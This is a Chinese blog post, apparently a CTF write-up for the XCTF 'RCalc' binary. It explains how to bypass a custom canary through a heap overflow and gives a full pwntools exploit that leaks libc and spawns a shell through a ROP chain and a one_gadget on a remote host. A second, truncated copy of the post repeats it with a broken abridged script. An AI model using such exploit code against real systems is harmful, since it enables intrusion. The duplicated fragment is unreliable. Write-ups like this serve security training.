XCTF-RCalc-WP

博主： chuj
发布时间：2021 年 03 月 06 日
888 次浏览
暂无评论
2580字数
分类： CTF-WP

这是一个挺有意思的栈溢出题，很久没做过栈溢出了，居然看了很久才发现漏洞点是栈溢出..

这里很明显有栈溢出，然后下面的

```
result = sub_400B92();
if ( result != v2 )
sub_400BD4();
```

感觉像是 canary，但是 `checksec` 一下发现并没有开启 canary

然后看一下 `sub_400AAB` 这个函数

发现是一个随机数生成的函数，并存到了 `*(qword_6020F0 + 8) + 8 * (*qword_6020F0 - 1)` 中

而 `sub_400B92` 函数

则是从 `*(qword_6020F0 + 8) + 8 * (*qword_6020F0) - 8` 中取回，也就是之前放进去的地方。也就是说这里是出题人自己实现了一个 canary，那么我们就无法直接栈溢出了。

从这里则可以知道，`qword_6020F0 + 8` 指向一个堆块的头。

然后再来看计算器中保存结果的这个函数

发现他是存到一个堆块中的，并且这个堆块在存 canary 的那个堆块的前面，也就是说我们完全可以利用计算器存储结果的这个函数实现堆溢出，溢出到储存 canary 的堆块里面，把我们栈溢出的函数保留的 canary 改为一个我们控制的值，在栈溢出时就可以覆盖 canary 了，这样就可以进行 rop 了。

又由于是 `%s` 造成的栈溢出，所以空格和换行都不能出现在 payload 中，`__libc_start_main@got` 是唯一一个不含空格的 got 表项，`printf@plt` 不含空格，而 `puts@plt` 含，所以也需要使用 `printf`。这样 leak 出了 libc_base 之后，就可以尝试 getshell 了，一般的做法是用 `system`，但是不知道为什么，我用 `system` 无法打通，会出现这样的错误：

遂使用 `one_gadget`，打通

### exp

```python
#!/usr/bin/env python
# coding=utf-8
from pwn import *
from LibcSearcher import *
context.terminal = ["tmux","splitw","-h"]
#context.log_level = 'debug'

elf = ELF('./RCalc')
pop_rdi_ret = 0x401123
csu1 = 0x40111A 
csu2 = 0x401100

def add_once():
    sh.sendlineafter("choice:",'1')
    sh.sendlineafter("integer: ",'0')
    sh.sendline('0')
    sh.sendlineafter("result? ",'yes')

#sh = process("./RCalc")
sh = remote("111.200.241.244",37644)

payload = 'a' * 0x108 + p64(0) + p64(0)
payload += p64(0x4007fe) #ret,stack align
payload += p64(pop_rdi_ret)
payload += p64(elf.got["__libc_start_main"])
payload += p64(elf.symbols["printf"])
payload += p64(0x401094) #ret2overflow

sh.sendlineafter("pls: ",payload)
for i in range(34 + 1):
    add_once()

#gdb.attach(proc.pidof(sh)[0])
sh.sendlineafter("choice:",'5')
__libc_start_main_addr = u64(sh.recv(6) + '\x00\x00')
libcs = LibcSearcher("__libc_start_main",__libc_start_main_addr)
libc_base = __libc_start_main_addr - libcs.dump("__libc_start_main")
libc = ELF("./libc.so.6")
log.success("libc_base:" + hex(libc_base))
system_addr = libc_base + libc.symbols["system"]
bin_sh_addr = libc_base + libc.search("/bin/sh").next()
one_gadget = libc_base + 0x4526a
log.success("system_addr:" + hex(system_addr))
log.success("bin_sh_addr:" + hex(bin_sh_addr))

payload = 'a' * 0x108 + p64(0) + p64(0)
#payload += p64(pop_rdi_ret)
#payload += p64(bin_sh_addr)
#payload += p64(system_addr)
payload += p64(one_gadget)

sh.sendlineafter("pls: ",payload)
for i in range(34 + 1):
    add_once()
sh.sendlineafter("choice:",'5')

sh.interactive()
```

最后修改：2021 年 03 月 06 日

如果觉得我的文章对你有用,那听听上面我喜欢的歌吧

发表评论取消回复

评论 *

私密评论

名称 *

🎲

邮箱 *

地址

gxh
大黑客还有女朋友羡慕死了(☆ω☆)
某人
这...我们公司今年在梦想小镇办的那场？
zzz
该评论仅登录用户及评论双方可见
wenruo
有计划真号
rantrism
您好～我是腾讯云开发者社区运营，关注了您分享的技术文章，觉得内...

XCTF-RCalc-WP

chuj • 2021 年 03 月 06 日

这是一个挺有意思的栈溢出题，很久没做过栈溢出了，居然看了很久才发现漏洞点是栈溢出..

这里很明显有栈溢出，然后下面的

```
result = sub_400B92();
if ( result != v2 )
sub_400BD4();
```

感觉像是 canary，但是 `checksec` 一下发现并没有开启 canary

然后看一下 `sub_400AAB` 这个函数

发现是一个随机数生成的函数，并存到了 `*(qword_6020F0 + 8) + 8 * (*qword_6020F0 - 1)` 中

而 `sub_400B92` 函数

从这里则可以知道，`qword_6020F0 + 8` 指向一个堆块的头。

然后再来看计算器中保存结果的这个函数

遂使用 `one_gadget`，打通

### exp

```python
#!/usr/bin/env python
# coding=utf-8
from pwn import *
from LibcSearcher import *
context.terminal = ["tmux","splitw","-h"]
#context.log_level = 'debug'

elf = ELF('./RCalc')
pop_rdi_ret = 0x401123
csu1 = 0x40111A 
csu2 = 0x401100

def add_once():
    sh.sendlineafter("choice:",'1')
    sh.sendlineafter("integer: ",'0')
    sh.sendline('0')
    sh.sendlineafter("result? ",'yes')

#sh = process("./RCalc")
sh = remote("111.200.241.244",37644)

sh.sendlineafter("pls: ",payload)
for i in range(34 + 1):
    add_once()

payload = 'a' * 0x108 + p64(0) + p64(0)
#payload += p64(pop_rdi_ret)
#payload += p64(bin_sh_addr)
#payload += p64(system_addr)
payload += p64(one_gadget)

sh.sendlineafter("pls: ",payload)
for i in range(34 + 1):
    add_once()
sh.sendlineafter("choice:",'5')

sh.interactive()
```

XCTF-RCalc-WP

发表评论取消回复

RCTF2021-musl-WP && 5space 2021 *CTF 2022 强网杯 2022 Musl 赛题 exp

写在大一结束

HGAME2021-WEAK1-WP

XCTF/BUU-babyfengshui-WP

BUU-360chunqiu2017_smallest-WP

BUU-pwnable_simple_login/XCTF-formate2-WP

10.19汇编

BUU-wustctf2020_easyfast-WP

PWNABLE.TW-Re-alloc Revenge-WP

10.22汇编

XCTF-RCalc-WP

发表评论 取消回复

XCTF-RCalc-WP

发表评论取消回复